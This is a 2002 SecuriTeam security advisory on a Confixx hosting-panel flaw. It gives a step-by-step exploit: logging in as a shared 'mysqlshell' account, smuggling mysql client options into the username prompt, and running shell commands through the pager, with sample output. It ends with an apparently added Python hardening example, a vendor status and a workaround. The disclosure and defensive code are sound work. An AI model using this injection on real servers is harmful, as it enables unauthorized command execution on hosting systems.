[UNIX] Confixx Vulnerability Allows Attacker Remote Control of the SQL Server

From: support@securiteam.com
Date: 07/26/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 26 Jul 2002 15:42:21 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Confixx Vulnerability Allows Attacker Remote Control of the SQL Server
------------------------------------------------------------------------

SUMMARY

Confixx (<http://www.yippi-yeah.com/de/p_confixx.php>) is a convenient
tool for automating customer administration on Linux-based web servers,
with graphical interfaces for administrators, resellers, and end users. A
security vulnerability in the product allows attackers to execute
arbitrary commands on the server, effectively giving them remote control
of it.

DETAILS

A security vulnerability in Confixx allows attackers to execute commands
on many Confixx boxes almost without needing a valid account. All an
attacker needs is:
 - To know whether the web hosting provider is running Confixx
 - The password of the "mysqlshell-user"
 - Access to the MySQL server

Since the password of the "mysqlshell-user" is the same for all customers,
obtaining it is trivial. The "mysqlshell-user" has a restricted shell;
however, elevated access can be obtained using the technique below.

NOTE: Some providers neglect to set a hard-to-guess password, leaving it
set to 123456.

With this account and password, you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

Here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

After that you will be prompted for a password; enter your PASSWORD (that
of the user "-e" on your MySQL server).

---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
..
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
..

Vendor status:
A customer who uses Confixx informed the vendor about 20 months ago. As a
result, Confixx added the line export EDITOR="/bin/false"; so an attacker
can no longer use "edit;" at the MySQL prompt to obtain an interactive
shell through it.

However, you can still log in to the MySQL server and execute commands.

Workaround:
Delete the "mysqlshell-user".
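The root cause described above is that whatever is typed at the "Bitte Usernamen eingeben:" prompt reaches the mysql client's own option parser, so option-like tokens such as -e, -h and --pager are honoured. The following added example (not Confixx's code, which is not on the page) reconstructs that pattern and places a hardened wrapper beside it: the input is validated against an allowlist, the command is built as an argument vector rather than a shell string, and user-derived values are passed only in --option=value form. The "web<N>" naming scheme, the wrapper's command shape and the fixed host are assumptions drawn from the advisory's sample session.

```python
# Added example for this advisory (not Confixx's code): a user-typed name
# must never reach the mysql client's option parser. The vulnerable argv
# construction sits beside a hardened one. Assumptions: the "web<N>" user
# name scheme (the advisory only shows "web1"), the wrapper's command shape,
# and the host being fixed by the wrapper rather than the user.
from __future__ import annotations

import re
import shlex
import subprocess

# Constructed policy: web users are "web" followed by 1-6 digits.
USERNAME_RE = re.compile(r"^web[0-9]{1,6}$")

# The string the advisory shows being typed at the "Bitte Usernamen eingeben:"
# prompt, reproduced verbatim as a raw string.
ADVISORY_INPUT = r"-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1"


def build_argv_vulnerable(username: str, host: str = "localhost") -> list[str]:
    """Hypothetical reconstruction of the flawed pattern: the name is pasted
    into a shell command line, so the shell re-tokenises it and every token
    the user typed becomes a separate argument for mysql to interpret."""
    cmdline = f"mysql -h {host} -u {username} -p {username}"
    return shlex.split(cmdline)


def option_like_tokens(user_input: str) -> list[str]:
    """Tokens a shell would split off the raw input that the mysql client
    would read as options. Usable as a pre-check or as a log-audit rule."""
    return [tok for tok in shlex.split(user_input) if tok.startswith("-")]


def rejection_reasons(username: str) -> list[str]:
    """Every reason a wrapper should refuse this name; empty means acceptable."""
    reasons: list[str] = []
    if any(c.isspace() for c in username):
        reasons.append("contains whitespace (would split into extra arguments)")
    if username.startswith("-"):
        reasons.append("starts with '-' (would be parsed as a mysql option)")
    if not USERNAME_RE.fullmatch(username):
        reasons.append("does not match the allowed web<N> pattern")
    return reasons


def build_argv_hardened(username: str, host: str = "localhost") -> list[str]:
    """Validate first, then build an argument vector (no shell), passing
    user-derived values only in --option=value form so a leading '-' in the
    value can never start a new option."""
    reasons = rejection_reasons(username)
    if reasons:
        raise ValueError("; ".join(reasons))
    return [
        "mysql",
        "--skip-pager",            # default pager off; a user can still re-enable one at the prompt
        f"--host={host}",          # host is chosen by the wrapper, never by the user
        f"--user={username}",
        f"--database={username}",
        "-p",                      # prompt for the password interactively
    ]


def launch(username: str) -> int:
    """Run the hardened command as an argv list; shell=False means no
    re-tokenisation. Returns the mysql client's exit status."""
    return subprocess.run(build_argv_hardened(username), check=False).returncode


if __name__ == "__main__":
    print("vulnerable argv:", build_argv_vulnerable(ADVISORY_INPUT))
    print("option-like tokens in input:", option_like_tokens(ADVISORY_INPUT))
    print("rejected because:", rejection_reasons(ADVISORY_INPUT))
    print("hardened argv for web1:", build_argv_hardened("web1"))
```

Even the hardened wrapper still hands an interactive mysql client to an OS account shared by every customer, and that client can run local programs through its pager and editor settings (the two paths this advisory uses), so input validation only narrows the problem. That is why the workaround above, removing the "mysqlshell-user" altogether, remains the effective fix.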

ADDITIONAL INFORMATION

The information has been provided by Ralf Dreibrodt <mailto:rd@mesos.de>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
